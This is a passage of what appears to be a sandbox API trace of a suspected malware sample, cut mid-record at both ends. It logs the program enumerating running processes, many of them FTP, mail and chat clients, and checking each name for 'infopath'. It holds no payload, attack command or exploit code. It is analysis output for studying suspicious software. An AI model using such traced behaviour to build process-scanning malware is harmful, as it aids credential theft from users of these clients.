cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.828] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577d98 [0096.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3577d98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0096.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0096.828] StrStrIA (lpFirst="barca.exe", lpSrch="infopath") returned 0x0 [0096.828] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.829] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577ca8 [0096.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3577ca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0096.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0096.829] StrStrIA (lpFirst="bitkinex.exe", lpSrch="infopath") returned 0x0 [0096.829] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.832] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577c48 [0096.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577c48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0096.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0096.832] StrStrIA (lpFirst="coreftp.exe", lpSrch="infopath") returned 0x0 [0096.832] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.833] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574de0 [0096.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574de0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0096.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0096.833] StrStrIA (lpFirst="far.exe", lpSrch="infopath") returned 0x0 [0096.834] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.835] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577db0 [0096.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3577db0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0096.835] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0096.835] StrStrIA (lpFirst="filezilla.exe", lpSrch="infopath") returned 0x0 [0096.835] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.837] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577d38 [0096.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3577d38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0096.837] StrStrIA (lpFirst="flashfxp.exe", lpSrch="infopath") returned 0x0 [0096.837] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.838] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577be8 [0096.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3577be8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0096.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0096.838] StrStrIA (lpFirst="fling.exe", lpSrch="infopath") returned 0x0 [0096.838] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.840] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35757a0 [0096.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35757a0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0096.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0096.840] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="infopath") returned 0x0 [0096.840] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.841] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575800 [0096.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3575800, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0096.842] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0096.842] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="infopath") returned 0x0 [0096.842] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.843] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574c70 [0096.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574c70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0096.843] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0096.843] StrStrIA (lpFirst="icq.exe", lpSrch="infopath") returned 0x0 [0096.843] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.845] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577cf0 [0096.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577cf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.845] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0096.845] StrStrIA (lpFirst="leechftp.exe", lpSrch="infopath") returned 0x0 [0096.845] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.886] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577c00 [0096.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577c00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.886] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0096.887] StrStrIA (lpFirst="ncftp.exe", lpSrch="infopath") returned 0x0 [0096.887] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.888] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577d08 [0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3577d08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0096.888] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0096.888] StrStrIA (lpFirst="notepad.exe", lpSrch="infopath") returned 0x0 [0096.888] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.889] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577c60 [0096.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3577c60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0096.890] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0096.890] StrStrIA (lpFirst="operamail.exe", lpSrch="infopath") returned 0x0 [0096.890] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.891] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577d20 [0096.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3577d20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0096.891] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0096.891] StrStrIA (lpFirst="outlook.exe", lpSrch="infopath") returned 0x0 [0096.891] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.892] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577cd8 [0096.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3577cd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.892] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0096.892] StrStrIA (lpFirst="pidgin.exe", lpSrch="infopath") returned 0x0 [0096.892] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.894] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577dc8 [0096.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577dc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0096.894] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0096.894] StrStrIA (lpFirst="scriptftp.exe", lpSrch="infopath") returned 0x0 [0096.894] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.895] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577e40 [0096.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3577e40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0096.895] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0096.895] StrStrIA (lpFirst="skype.exe", lpSrch="infopath") returned 0x0 [0096.895] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.897] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577d50 [0096.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577d50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.897] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0096.897] StrStrIA (lpFirst="smartftp.exe", lpSrch="infopath") returned 0x0 [0096.897] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.898] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577e58 [0096.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3577e58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0096.898] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0096.898] StrStrIA (lpFirst="thunderbird.exe", lpSrch="infopath") returned 0x0 [0096.898] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.899] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577bb8 [0096.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3577bb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0096.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0096.900] StrStrIA (lpFirst="totalcmd.exe", lpSrch="infopath") returned 0x0 [0096.900] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.901] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577d68 [0096.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3577d68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0096.901] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0096.901] StrStrIA (lpFirst="trillian.exe", lpSrch="infopath") returned 0x0 [0096.901] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.902] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577d80 [0096.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3577d80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0096.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0096.902] StrStrIA (lpFirst="webdrive.exe", lpSrch="infopath") returned 0x0 [0096.902] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.903] WideCharToMultiByte (in: CodePage=0x0, 